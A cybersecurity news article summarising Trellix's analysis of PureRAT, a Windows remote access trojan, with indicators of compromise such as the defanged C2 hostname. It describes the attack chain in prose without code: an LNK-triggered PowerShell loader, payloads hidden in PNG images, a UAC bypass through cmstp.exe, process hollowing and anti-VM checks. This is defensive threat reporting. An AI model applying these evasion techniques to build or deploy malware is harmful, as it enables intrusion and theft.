PureRAT Unmasked: The Stealthy, Multi-Stage “Dynamic Loader” Targeting Windows
Do Son 
Infection chain | Image: Trellix
The Trellix Advanced Research Center has released an in-depth analysis of PureRAT, an advanced remote access trojan (RAT) that employs a complex, multi-stage infection chain to evade detection and establish a permanent foothold on victim systems. Characterized by its use of fileless delivery and sophisticated steganography, PureRAT is described by researchers as a “versatile dynamic loader” rather than a traditional, bulky malware package.
The intrusion begins with a deceptive .LNK file (Windows shortcut) that, when executed, triggers a concealed PowerShell command to fetch a heavily obfuscated VBS loader.
One of the most notable features of the PureRAT infection chain is its reliance on steganography to bypass signature-based security tools.
Malicious portable executable (PE) files are hidden within legitimate-looking PNG images, such as Oxptimized_MSI.png and GeneratedPay.png. A PowerShell script then identifies specific indices within these images to extract, decode, and load the malware directly into memory.
The initial implant is intentionally minimal to maintain a stealthy profile. Trellix researchers explain:
“Rather than deploying a bulky, feature-complete executable that might be easily flagged by signature-based detection, the initial implant remains dormant, maintaining a minimal footprint on the infected system.”
This implant waits for a command-and-control (C2) operator to push specific modules on demand. These modules can include:
- Environmental Monitoring: Unauthorized access to microphones and webcams.
- Credential Harvesting: Real-time keylogging to steal sensitive logins.
- Remote Desktop Access: Establishing hidden connections to bypass security controls and interact directly with the victim’s environment.
To ensure successful execution on modern Windows systems, PureRAT utilizes several advanced “anti-forensic” tactics:
- UAC Bypass: The malware uses the legitimate Windows binary cmstp.exe to achieve auto-elevation. Because Microsoft has whitelisted this binary, it “automatically achieves high integrity without triggering a UAC prompt”.
- Process Hollowing: Malicious code is injected into a suspended, legitimate process—specifically Msbuild.exe—while the original binary on the disk remains a “signed, legitimate Windows file”.
- Anti-VM Checks: The malware conducts environment checks for VMware and QEMU (specifically looking for the MAC address 52:54:00:44:04:AF) to detect and evade virtual analysis environments.
Once fully deployed, the final PureRAT payload performs extensive host fingerprinting. It queries the system to identify installed security products, hardware serial numbers, user privileges, and even searches for desktop and browser-based cryptocurrency wallets.
Finally, the malware enters a persistent tasking loop, acting as a “continuous listener ready to process incoming instructions” from its C2 server, currently linked to the hostname instantservices1[.]ddnsguru[.]com.
PureRAT’s modular architecture allows it to evolve far beyond its initial reconnaissance phase. By leveraging legitimate system processes and hiding its payload in image files, it remains a difficult-to-detect threat for both individual users and corporate environments. Trellix researchers warn that this methodology “substantially aids the malware in evading detection, unlike conventional file infectors”.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
